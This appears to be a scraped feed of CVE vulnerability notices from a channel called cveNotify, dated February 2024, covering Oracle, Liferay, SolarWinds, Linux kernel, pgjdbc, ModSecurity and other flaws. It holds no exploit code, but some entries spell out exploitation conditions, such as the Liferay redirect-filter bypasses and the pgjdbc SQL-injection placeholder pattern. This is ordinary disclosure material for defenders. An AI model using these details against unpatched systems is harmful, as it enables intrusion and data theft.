🚨 CVE-2023-40057The SolarWinds Access Rights Manager was found to be susceptible to a Remote Code Execution Vulnerability. If exploited, this vulnerability allows an authenticated user to abuse a SolarWinds service resulting in remote code execution.🎖@cveNotify |
|
| 2024-02-20 21:07:25 |
🚨 CVE-2023-44253An exposure of sensitive information to an unauthorized actor vulnerability [CWE-200] in Fortinet FortiManager version 7.4.0 through 7.4.1 and before 7.2.5, FortiAnalyzer version 7.4.0 through 7.4.1 and before 7.2.5 and FortiAnalyzer-BigData before 7.2.5 allows an adom administrator to enumerate other adoms and device names via crafted HTTP or HTTPS requests.🎖@cveNotify |
|
| 2024-02-20 20:37:26 |
🚨 CVE-2024-23479SolarWinds Access Rights Manager (ARM) was found to be susceptible to a Directory Traversal Remote Code Execution Vulnerability. If exploited, this vulnerability allows an unauthenticated user to achieve a Remote Code Execution.🎖@cveNotify |
|
| 2024-02-20 20:07:44 |
🚨 CVE-2024-20929Vulnerability in the Oracle Application Object Library product of Oracle E-Business Suite (component: DB Privileges). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Application Object Library. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Application Object Library accessible data as well as unauthorized read access to a subset of Oracle Application Object Library accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N).🎖@cveNotify |
|
| 2024-02-20 20:07:43 |
🚨 CVE-2024-20925Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JavaFX). Supported versions that are affected are Oracle Java SE: 8u391; Oracle GraalVM Enterprise Edition: 20.3.12 and 21.3.8. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2024-02-20 20:07:42 |
🚨 CVE-2024-20921Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21, 17.0.9, 21.0.1; Oracle GraalVM for JDK: 17.0.9, 21.0.1; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N).🎖@cveNotify |
|
| 2024-02-20 20:07:38 |
🚨 CVE-2024-20917Vulnerability in the Oracle Enterprise Manager Base Platform product of Oracle Enterprise Manager (component: Log Management). The supported version that is affected is 13.5.0.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Enterprise Manager Base Platform. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Enterprise Manager Base Platform, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Enterprise Manager Base Platform accessible data as well as unauthorized update, insert or delete access to some of Oracle Enterprise Manager Base Platform accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Enterprise Manager Base Platform. CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:L).🎖@cveNotify |
|
| 2024-02-20 20:07:37 |
🚨 CVE-2024-20913Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: BI Platform Security). The supported version that is affected is 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Business Intelligence Enterprise Edition, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized read access to a subset of Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).🎖@cveNotify |
|
| 2024-02-20 20:07:36 |
🚨 CVE-2024-20911Vulnerability in Oracle Audit Vault and Database Firewall (component: Firewall). Supported versions that are affected are 20.1-20.9. Difficult to exploit vulnerability allows high privileged attacker with network access via Oracle Net to compromise Oracle Audit Vault and Database Firewall. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Audit Vault and Database Firewall, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Audit Vault and Database Firewall accessible data. CVSS 3.1 Base Score 2.6 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:N/A:N).🎖@cveNotify |
|
| 2024-02-20 20:07:32 |
🚨 CVE-2024-20907Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (component: File download). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Web Applications Desktop Integrator, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Web Applications Desktop Integrator accessible data as well as unauthorized read access to a subset of Oracle Web Applications Desktop Integrator accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).🎖@cveNotify |
|
| 2024-02-20 20:07:31 |
🚨 CVE-2023-21833Vulnerability in the Oracle ZFS Storage Appliance Kit product of Oracle Systems (component: Object Store). The supported version that is affected is 8.8. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle ZFS Storage Appliance Kit. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle ZFS Storage Appliance Kit accessible data. CVSS 3.1 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).🎖@cveNotify |
|
| 2024-02-20 20:07:26 |
🚨 CVE-2024-24758Undici is an HTTP/1.1 client, written from scratch for Node.js. Undici already cleared Authorization headers on cross-origin redirects, but did not clear `Proxy-Authentication` headers. This issue has been patched in versions 5.28.3 and 6.6.1. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-02-20 20:07:25 |
🚨 CVE-2024-24750Undici is an HTTP/1.1 client, written from scratch for Node.js. In affected versions calling `fetch(url)` and not consuming the incoming body ((or consuming it very slowing) will lead to a memory leak. This issue has been addressed in version 6.6.1. Users are advised to upgrade. Users unable to upgrade should make sure to always consume the incoming body.🎖@cveNotify |
|
| 2024-02-20 19:07:26 |
🚨 CVE-2023-39251Dell BIOS contains an Improper Input Validation vulnerability. A local malicious user with high privileges could potentially exploit this vulnerability in order to corrupt memory on the system.🎖@cveNotify |
|
| 2024-02-20 18:37:32 |
🚨 CVE-2023-39540A denial of service vulnerability exists in the ICMP and ICMPv6 parsing functionality of Weston Embedded uC-TCP-IP v3.06.01. A specially crafted network packet can lead to an out-of-bounds read. An attacker can send a malicious packet to trigger this vulnerability.This vulnerability concerns a denial of service within the parsing an IPv4 ICMP packet.🎖@cveNotify |
|
| 2024-02-20 18:37:25 |
🚨 CVE-2024-24794A use-after-free vulnerability exists in the DICOM Element Parsing as implemented in Imaging Data Commons libdicom 1.0.5. A specially crafted DICOM file can cause premature freeing of memory that is used later. To trigger this vulnerability, an attacker would need to induce the vulnerable application to process a malicious DICOM image.The Use-After-Free happens in the `parse_meta_sequence_end()` parsing the Sequence Value Represenations.🎖@cveNotify |
|
| 2024-02-20 18:37:24 |
🚨 CVE-2024-24793A use-after-free vulnerability exists in the DICOM Element Parsing as implemented in Imaging Data Commons libdicom 1.0.5. A specially crafted DICOM file can cause premature freeing of memory that is used later. To trigger this vulnerability, an attacker would need to induce the vulnerable application to process a malicious DICOM image.The Use-After-Free happens in the `parse_meta_element_create()` parsing the elements in the File Meta Information header.🎖@cveNotify |
|
| 2024-02-20 17:07:39 |
🚨 CVE-2023-50387Certain DNSSEC aspects of the DNS protocol (in RFC 4033, 4034, 4035, 6840, and related RFCs) allow remote attackers to cause a denial of service (CPU consumption) via one or more DNSSEC responses, aka the "KeyTrap" issue. One of the concerns is that, when there is a zone with many DNSKEY and RRSIG records, the protocol specification implies that an algorithm must evaluate all combinations of DNSKEY and RRSIG records.🎖@cveNotify |
|
| 2024-02-20 16:37:37 |
🚨 CVE-2024-25366Buffer Overflow vulnerability in mz-automation.de libiec61859 v.1.4.0 allows a remote attacker to cause a denial of service via the mmsServer_handleGetNameListRequest function to the mms_getnamelist_service component.🎖@cveNotify |
|
| 2024-02-20 16:37:31 |
🚨 CVE-2024-25274An arbitrary file upload vulnerability in the component /sysFile/upload of Novel-Plus v4.3.0-RC1 allows attackers to execute arbitrary code via uploading a crafted file.🎖@cveNotify |
|
| 2024-02-20 16:37:30 |
🚨 CVE-2024-23313An integer underflow vulnerability exists in the sopen_FAMOS_read functionality of The Biosig Project libbiosig 2.5.0 and Master Branch (ab0ee111). A specially crafted .famos file can lead to an out-of-bounds write which in turn can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2024-02-20 16:37:29 |
🚨 CVE-2024-23310A use-after-free vulnerability exists in the sopen_FAMOS_read functionality of The Biosig Project libbiosig 2.5.0 and Master Branch (ab0ee111). A specially crafted .famos file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2024-02-20 16:37:26 |
🚨 CVE-2024-23305An out-of-bounds write vulnerability exists in the BrainVisionMarker Parsing functionality of The Biosig Project libbiosig 2.5.0 and Master Branch (ab0ee111). A specially crafted .vmrk file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2024-02-20 16:37:25 |
🚨 CVE-2024-21795A heap-based buffer overflow vulnerability exists in the .egi parsing functionality of The Biosig Project libbiosig 2.5.0 and Master Branch (ab0ee111). A specially crafted .egi file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2024-02-20 16:37:24 |
🚨 CVE-2024-0622Local privilege escalation vulnerability affects OpenText Operations Agent product versions 12.15 and 12.20-12.25 when installed on Non-Windows platforms. The vulnerability could allow local privilege escalation.🎖@cveNotify |
|
| 2024-02-20 15:37:40 |
🚨 CVE-2024-22824An issue in Timo v.2.0.3 allows a remote attacker to execute arbitrary code via the filetype restrictions in the UploadController.java component.🎖@cveNotify |
|
| 2024-02-20 15:37:39 |
🚨 CVE-2024-1156Incorrect directory permissions for the shared NI RabbitMQ service may allow a local authenticated user to read RabbitMQ configuration information and potentially enable escalation of privileges.🎖@cveNotify |
|
| 2024-02-20 15:37:38 |
🚨 CVE-2024-1155Incorrect permissions in the installation directories for shared SystemLink Elixir based services may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-02-20 15:37:35 |
🚨 CVE-2023-45318A heap-based buffer overflow vulnerability exists in the HTTP Server functionality of Weston Embedded uC-HTTP git commit 80d4004. A specially crafted network packet can lead to arbitrary code execution. An attacker can send a malicious packet to trigger this vulnerability.🎖@cveNotify |
|
| 2024-02-20 15:37:34 |
🚨 CVE-2023-39540A denial of service vulnerability exists in the ICMP and ICMPv6 parsing functionality of Weston Embedded uC-TCP-IP v3.06.01. A specially crafted network packet can lead to an out-of-bounds read. An attacker can send a malicious packet to trigger this vulnerability.This vulnerability concerns a denial of service within the parsing an IPv4 ICMP packet.🎖@cveNotify |
|
| 2024-02-20 15:37:33 |
🚨 CVE-2023-6536A flaw was found in the Linux kernel's NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver, causing kernel panic and a denial of service.🎖@cveNotify |
|
| 2024-02-20 15:37:29 |
🚨 CVE-2024-0646An out-of-bounds memory write flaw was found in the Linux kernel’s Transport Layer Security functionality in how a user calls a function splice with a ktls socket as the destination. This flaw allows a local user to crash or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2024-02-20 15:37:28 |
🚨 CVE-2023-6606An out-of-bounds read vulnerability was found in smbCalcSize in fs/smb/client/netmisc.c in the Linux Kernel. This issue could allow a local attacker to crash the system or leak internal kernel information.🎖@cveNotify |
|
| 2024-02-20 14:37:40 |
🚨 CVE-2023-50306IBM Common Licensing 9.0 could allow a local user to enumerate usernames due to an observable response discrepancy. IBM X-Force ID: 273337.🎖@cveNotify |
|
| 2024-02-20 14:37:39 |
🚨 CVE-2023-39244DELL ESI (Enterprise Storage Integrator) for SAP LAMA, version 10.0, contains an information disclosure vulnerability in EHAC component. An remote unauthenticated attacker could potentially exploit this vulnerability by eavesdropping the network traffic to gain admin level credentials.🎖@cveNotify |
|
| 2024-02-20 13:37:45 |
🚨 CVE-2024-26581netfilter: nft_set_rbtree: skip end interval element from gcrbtree lazy gc on insert might collect an end interval element that hasbeen just added in this transactions, skip end interval elements thatare not yet active.🎖@cveNotify |
|
| 2024-02-20 13:37:44 |
🚨 CVE-2024-25610In Liferay Portal 7.2.0 through 7.4.3.12, and older unsupported versions, and Liferay DXP 7.4 before update 9, 7.3 before update 4, 7.2 before fix pack 19, and older unsupported versions, the default configuration does not sanitize blog entries of JavaScript, which allows remote authenticated users to inject arbitrary web script or HTML (XSS) via a crafted payload injected into a blog entry’s content text field.🎖@cveNotify |
|
| 2024-02-20 13:37:43 |
🚨 CVE-2024-1661A vulnerability classified as problematic was found in Totolink X6000R 9.4.0cu.852_B20230719. Affected by this vulnerability is an unknown functionality of the file /etc/shadow. The manipulation leads to hard-coded credentials. It is possible to launch the attack on the local host. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254179. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-02-20 13:37:39 |
🚨 CVE-2023-51770Arbitrary File Read Vulnerability in Apache Dolphinscheduler.This issue affects Apache DolphinScheduler: before 3.2.1. We recommend users to upgrade Apache DolphinScheduler to version 3.2.1, which fixes the issue.🎖@cveNotify |
|
| 2024-02-20 13:37:38 |
🚨 CVE-2023-49109Exposure of Remote Code Execution in Apache Dolphinscheduler.This issue affects Apache DolphinScheduler: before 3.2.1. We recommend users to upgrade Apache DolphinScheduler to version 3.2.1, which fixes the issue.🎖@cveNotify |
|
| 2024-02-20 11:37:26 |
🚨 CVE-2024-24794A use-after-free vulnerability exists in the DICOM Element Parsing as implemented in Imaging Data Commons libdicom 1.0.5. A specially crafted DICOM file can cause premature freeing of memory that is used later. To trigger this vulnerability, an attacker would need to induce the vulnerable application to process a malicious DICOM image.The Use-After-Free happens in the `parse_meta_sequence_end()` parsing the Sequence Value Represenations.🎖@cveNotify |
|
| 2024-02-20 11:37:25 |
🚨 CVE-2023-7245The nodejs framework in OpenVPN Connect 3.0 through 3.4.3 (Windows)/3.4.7 (macOS) was not properly configured, which allows a local user to execute arbitrary code within the nodejs process context via the ELECTRON_RUN_AS_NODE environment variable🎖@cveNotify |
|
| 2024-02-20 10:37:45 |
🚨 CVE-2024-25609HtmlUtil.escapeRedirect in Liferay Portal 7.2.0 through 7.4.3.12, and older unsupported versions, and Liferay DXP 7.4 before update 9, 7.3 service pack 3, 7.2 fix pack 15 through 18, and older unsupported versions can be circumvented by using two forward slashes, which allows remote attackers to redirect users to arbitrary external URLs via the (1) 'redirect` parameter (2) `FORWARD_URL` parameter, and (3) others parameters that rely on HtmlUtil.escapeRedirect. This vulnerability is the result of an incomplete fix in CVE-2022-28977.🎖@cveNotify |
|
| 2024-02-20 10:37:44 |
🚨 CVE-2024-25608HtmlUtil.escapeRedirect in Liferay Portal 7.2.0 through 7.4.3.18, and older unsupported versions, and Liferay DXP 7.4 before update 19, 7.3 before update 4, 7.2 before fix pack 19, and older unsupported versions can be circumvented by using the 'REPLACEMENT CHARACTER' (U+FFFD), which allows remote attackers to redirect users to arbitrary external URLs via the (1) 'redirect` parameter (2) `FORWARD_URL` parameter, (3) `noSuchEntryRedirect` parameter, and (4) others parameters that rely on HtmlUtil.escapeRedirect.🎖@cveNotify |
|
| 2024-02-20 10:37:40 |
🚨 CVE-2023-51770Arbitrary File Read Vulnerability in Apache Dolphinscheduler.This issue affects Apache DolphinScheduler: before 3.2.1. We recommend users to upgrade Apache DolphinScheduler to version 3.2.1, which fixes the issue.🎖@cveNotify |
|
| 2024-02-20 10:37:39 |
🚨 CVE-2023-49250Because the HttpUtils class did not verify certificates, an attacker that could perform a Man-in-the-Middle (MITM) attack on outgoing https connections could impersonate the server.This issue affects Apache DolphinScheduler: before 3.2.0.Users are recommended to upgrade to version 3.2.1, which fixes the issue.🎖@cveNotify |
|
| 2024-02-20 10:37:38 |
🚨 CVE-2023-49109Exposure of Remote Code Execution in Apache Dolphinscheduler.This issue affects Apache DolphinScheduler: before 3.2.1. We recommend users to upgrade Apache DolphinScheduler to version 3.2.1, which fixes the issue.🎖@cveNotify |
|
| 2024-02-20 09:37:49 |
🚨 CVE-2024-25604Liferay Portal 7.2.0 through 7.4.3.4, and older unsupported versions, and Liferay DXP 7.4.13, 7.3 before service pack 3, 7.2 before fix pack 17, and older unsupported versions does not properly check user permissions, which allows remote authenticated users with the VIEW user permission to edit their own permission via the User and Organizations section of the Control Panel.🎖@cveNotify |
|
| 2024-02-20 09:37:48 |
🚨 CVE-2024-0646An out-of-bounds memory write flaw was found in the Linux kernel’s Transport Layer Security functionality in how a user calls a function splice with a ktls socket as the destination. This flaw allows a local user to crash or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2024-02-20 09:36:31 |
None |
|
| 2024-02-20 08:37:25 |
🚨 CVE-2024-25973The Frentix GmbH OpenOlat LMS is affected by multiple stored Cross-Site Scripting (XSS) vulnerabilities. An attacker with rights to create or edit groups can create a course with a name that contains an XSS payload. Furthermore, attackers with the permissions to create or rename a catalog (sub-category) can enter unfiltered input in the name field. In addition, attackers who are allowed to create curriculums can also enter unfiltered input in the name field. This allows an attacker to execute stored JavaScript code with the permissions of the victim in the context of the user's browser.🎖@cveNotify |
|
| 2024-02-20 08:37:24 |
🚨 CVE-2024-25150Information disclosure vulnerability in the Control Panel in Liferay Portal 7.2.0 through 7.4.2, and older unsupported versions, and Liferay DXP 7.3 before update 4, 7.2 before fix pack 19, and older unsupported versions allows remote authenticated users to obtain a user's full name from the page's title by enumerating user screen names.🎖@cveNotify |
|
| 2024-02-20 07:37:27 |
🚨 CVE-2024-22234In Spring Security, versions 6.1.x prior to 6.1.7 and versions 6.2.x prior to 6.2.2, an application is vulnerable to broken access control when it directly uses the AuthenticationTrustResolver.isFullyAuthenticated(Authentication) method.Specifically, an application is vulnerable if: * The application uses AuthenticationTrustResolver.isFullyAuthenticated(Authentication) directly and a null authentication parameter is passed to it resulting in an erroneous true return value.An application is not vulnerable if any of the following is true: * The application does not use AuthenticationTrustResolver.isFullyAuthenticated(Authentication) directly. * The application does not pass null to AuthenticationTrustResolver.isFullyAuthenticated * The application only uses isFullyAuthenticated via Method Security https://docs.spring.io/spring-security/reference/servlet/authorization/method-security.html or HTTP Request Security https://docs.spring.io/spring-security/reference/servlet/authorization/authorize-http-requests.html🎖@cveNotify |
|
| 2024-02-20 07:37:26 |
🚨 CVE-2023-44308Open redirect vulnerability in adaptive media administration page in Liferay DXP 2023.Q3 before patch 6, and 7.4 GA through update 92 allows remote attackers to redirect users to arbitrary external URLs via the _com_liferay_adaptive_media_web_portlet_AMPortlet_redirect parameter.🎖@cveNotify |
|
| 2024-02-20 06:37:24 |
🚨 CVE-2023-5190Open redirect vulnerability in the Countries Management’s edit region page in Liferay Portal 7.4.3.45 through 7.4.3.101, and Liferay DXP 2023.Q3 before patch 6, and 7.4 update 45 through 92 allows remote attackers to redirect users to arbitrary external URLs via the _com_liferay_address_web_internal_portlet_CountriesManagementAdminPortlet_redirect parameter.🎖@cveNotify |
|
| 2024-02-20 05:37:24 |
🚨 CVE-2022-45320Liferay Portal before 7.4.3.16 and Liferay DXP before 7.2 fix pack 19, 7.3 before update 6, and 7.4 before update 16 allow remote authenticated users to become the owner of a wiki page by editing the wiki page.🎖@cveNotify |
|
| 2024-02-20 04:37:27 |
🚨 CVE-2024-1559The Link Library plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'll_reciprocal' parameter in all versions up to, and including, 7.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-02-20 03:37:33 |
🚨 CVE-2023-6398A post-authentication command injection vulnerability in the file upload binary in Zyxel ATP series firmware versions from 4.32 through 5.37 Patch 1, USG FLEX series firmware versions from 4.50 through 5.37 Patch 1, USG FLEX 50(W) series firmware versions from 4.16 through 5.37 Patch 1, USG20(W)-VPN series firmware versions from 4.16 through 5.37 Patch 1, NWA50AX firmware versions through 6.29(ABYW.3), WAC500 firmware versions through 6.65(ABVS.1), WAX300H firmware versions through 6.60(ACHF.1), and WBE660S firmware versions through 6.65(ACGG.1) could allow an authenticated attacker with administrator privileges to execute some operating system (OS) commands on an affected device via FTP.🎖@cveNotify |
|
| 2024-02-20 03:37:26 |
🚨 CVE-2024-24259freeglut through 3.4.0 was discovered to contain a memory leak via the menuEntry variable in the glutAddMenuEntry function.🎖@cveNotify |
|
| 2024-02-20 03:37:25 |
🚨 CVE-2023-6693A stack based buffer overflow was found in the virtio-net device of QEMU. This issue occurs when flushing TX in the virtio_net_flush_tx function if guest features VIRTIO_NET_F_HASH_REPORT, VIRTIO_F_VERSION_1 and VIRTIO_NET_F_MRG_RXBUF are enabled. This could allow a malicious user to overwrite local variables allocated on the stack. Specifically, the `out_sg` variable could be used to read a part of process memory and send it to the wire, causing an information leak.🎖@cveNotify |
|
| 2024-02-20 02:37:25 |
🚨 CVE-2024-1019ModSecurity / libModSecurity 3.0.0 to 3.0.11 is affected by a WAF bypass for path-based payloads submitted via specially crafted request URLs. ModSecurity v3 decodes percent-encoded characters present in request URLs before it separates the URL path component from the optional query string component. This results in an impedance mismatch versus RFC compliant back-end applications. The vulnerability hides an attack payload in the path component of the URL from WAF rules inspecting it. A back-end may be vulnerable if it uses the path component of request URLs to construct queries. Integrators and users are advised to upgrade to 3.0.12. The ModSecurity v2 release line is not affected by this vulnerability.🎖@cveNotify |
|
| 2024-02-20 01:37:45 |
🚨 CVE-2024-1647Pyhtml2pdf version 0.0.6 allows an external attacker to remotely obtainarbitrary local files. This is possible because the application does notvalidate the HTML content entered by the user.🎖@cveNotify |
|
| 2024-02-20 00:37:34 |
🚨 CVE-2024-1297Loomio version 2.22.0 allows executing arbitrary commands on the server.This is possible because the application is vulnerable to OS Command Injection.🎖@cveNotify |
|
| 2024-02-20 00:37:33 |
🚨 CVE-2022-48625Yealink Config Encrypt Tool add RSA before 1.2 has a built-in RSA key pair, and thus there is a risk of decryption by an adversary.🎖@cveNotify |
|
| 2024-02-19 23:37:25 |
🚨 CVE-2024-26134cbor2 provides encoding and decoding for the Concise Binary Object Representation (CBOR) (RFC 8949) serialization format. Starting in version 5.5.1 and prior to version 5.6.2, an attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object. Version 5.6.2 contains a patch for this issue.🎖@cveNotify |
|
| 2024-02-19 23:37:24 |
🚨 CVE-2023-4039**DISPUTED**A failure in the -fstack-protector feature in GCC-based toolchains that target AArch64 allows an attacker to exploit an existing buffer overflow in dynamically-sized local variables in your application without this being detected. This stack-protector failure only applies to C99-style dynamically-sized local variables or those created using alloca(). The stack-protector operates as intended for statically-sized local variables.The default behavior when the stack-protector detects an overflow is to terminate your application, resulting in controlled loss of availability. An attacker who can exploit a buffer overflow without triggering the stack-protector might be able to change program flow control to cause an uncontrolled loss of availability or to go further and affect confidentiality or integrity. NOTE: The GCC project argues that this is a missed hardening bug and not a vulnerability by itself.🎖@cveNotify |
|
| 2024-02-19 22:37:25 |
🚨 CVE-2023-6260Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Brivo ACS100, ACS300 allows OS Command Injection, Bypassing Physical Security.This issue affects ACS100 (Network Adjacent Access), ACS300 (Physical Access): from 5.2.4 before 6.2.4.3.🎖@cveNotify |
|
| 2024-02-19 22:37:24 |
🚨 CVE-2023-6259Insufficiently Protected Credentials, : Improper Access Control vulnerability in Brivo ACS100, ACS300 allows Password Recovery Exploitation, Bypassing Physical Security.This issue affects ACS100, ACS300: from 5.2.4 before 6.2.4.3.🎖@cveNotify |
|
| 2024-02-19 20:37:25 |
🚨 CVE-2024-25626Yocto Project is an open source collaboration project that helps developers create custom Linux-based systems regardless of the hardware architecture. In Yocto Projects Bitbake before 2.6.2 (before and included Yocto Project 4.3.1), with the Toaster server (included in bitbake) running, missing input validation allows an attacker to perform a remote code execution in the server's shell via a crafted HTTP request. Authentication is not necessary. Toaster server execution has to be specifically run and is not the default for Bitbake command line builds, it is only used for the Toaster web based user interface to Bitbake. The fix has been backported to the bitbake included with Yocto Project 5.0, 3.1.31, 4.0.16, and 4.3.2.🎖@cveNotify |
|
| 2024-02-19 20:37:24 |
🚨 CVE-2023-50257eProsima Fast DDS (formerly Fast RTPS) is a C++ implementation of the Data Distribution Service standard of the Object Management Group. Even with the application of SROS2, due to the issue where the data (`p[UD]`) and `guid` values used to disconnect between nodes are not encrypted, a vulnerability has been discovered where a malicious attacker can forcibly disconnect a Subscriber and can deny a Subscriber attempting to connect. Afterwards, if the attacker sends the packet for disconnecting, which is data (`p[UD]`), to the Global Data Space (`239.255.0.1:7400`) using the said Publisher ID, all the Subscribers (Listeners) connected to the Publisher (Talker) will not receive any data and their connection will be disconnected. Moreover, if this disconnection packet is sent continuously, the Subscribers (Listeners) trying to connect will not be able to do so. Since the initial commit of the `SecurityManager.cpp` code (`init`, `on_process_handshake`) on Nov 8, 2016, the Disconnect Vulnerability in RTPS Packets Used by SROS2 has been present prior to versions 2.13.0, 2.12.2, 2.11.3, 2.10.3, and 2.6.7.🎖@cveNotify |
|
| 2024-02-19 17:37:32 |
🚨 CVE-2024-25979The URL parameters accepted by forum search were not limited to the allowed parameters.🎖@cveNotify |
|
| 2024-02-19 17:37:26 |
🚨 CVE-2024-25978Insufficient file size checks resulted in a denial of service risk in the file picker's unzip functionality.🎖@cveNotify |
|
| 2024-02-19 17:37:25 |
🚨 CVE-2023-3897Username enumeration is possible through Bypassing CAPTCHA in On-premise SureMDM Solution on Windows deployment allows attacker to enumerate local user information via error message.This issue affects SureMDM On-premise: 6.31 and below version🎖@cveNotify |
|
| 2024-02-19 17:37:24 |
🚨 CVE-2021-3860JFrog Artifactory before 7.25.4 (Enterprise+ deployments only), is vulnerable to Blind SQL Injection by a low privileged authenticated user due to incomplete validation when performing an SQL query.🎖@cveNotify |
|
| 2024-02-19 16:37:36 |
🚨 CVE-2024-25623Mastodon is a free, open-source social network server based on ActivityPub. Prior to versions 4.2.7, 4.1.15, 4.0.15, and 3.5.19, when fetching remote statuses, Mastodon doesn't check that the response from the remote server has a `Content-Type` header value of the Activity Streams media type, which allows a threat actor to upload a crafted Activity Streams document to a remote server and make a Mastodon server fetch it, if the remote server accepts arbitrary user uploads. The vulnerability allows a threat actor to impersonate an account on a remote server that satisfies all of the following properties: allows the attacker to register an account; accepts arbitrary user-uploaded documents and places them on the same domain as the ActivityPub actors; and serves user-uploaded document in response to requests with an `Accept` header value of the Activity Streams media type. Versions 4.2.7, 4.1.15, 4.0.15, and 3.5.19 contain a fix for this issue.🎖@cveNotify |
|
| 2024-02-19 13:37:30 |
🚨 CVE-2024-1597pgjdbc, the PostgreSQL JDBC Driver, allows attacker to inject SQL if using PreferQueryMode=SIMPLE. Note this is not the default. In the default mode there is no vulnerability. A placeholder for a numeric value must be immediately preceded by a minus. There must be a second placeholder for a string value after the first placeholder; both must be on the same line. By constructing a matching string payload, the attacker can inject SQL to alter the query,bypassing the protections that parameterized queries bring against SQL Injection attacks. Versions before 42.7.2, 42.6.1, 42.5.5, 42.4.4, 42.3.9, and 42.2.8 are affected.🎖@cveNotify |
|
| 2024-02-19 12:37:53 |
